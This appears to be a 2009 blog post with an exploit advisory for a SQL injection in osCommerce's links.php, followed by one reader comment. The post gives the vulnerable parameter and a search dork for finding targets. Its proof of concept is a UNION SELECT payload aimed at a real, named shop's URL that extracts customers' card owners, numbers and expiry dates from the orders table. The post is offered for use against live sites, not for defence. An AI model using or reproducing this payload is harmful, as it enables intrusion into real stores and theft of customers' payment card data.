LFI to RCE via access_log injection

on
18

osCommerce SQL Injection Vuln

on 

[o] osCommerce SQL Injection VulnerabilitySoftware : osCommerce
Vendor   : http://www.oscommerce.com/
Download : http://www.oscommerce.com/solutions/downloads/
Author   : NoGe

[o] Vulnerable file
links.php

[o] Exploithttp://localhost/[path]/links.php?link_id==[SQL]

[o] Proof of concepthttp://www.sportmueller-pocking.de/catalog/links.php?link_id=12661+AND+1=2+UNION+SELECT+0,1,group_concat%28cc_type,0x3a,cc_owner,0x3a,cc_number,0x3a,cc_expires%29,3,4,5,6,7,8+from+orders/*

[o] Dork"Powered by osCommerce"

[o] Note
i dont know which version of this osCommerce but its vulnerable.
target not to much so i think this is an old version.

Comments

Ahmad Mushtaq said…
thanks for the news...
But this trick is not working in the latest release of Oscommerce.
December 5, 2009 at 2:30 AM
Post a Comment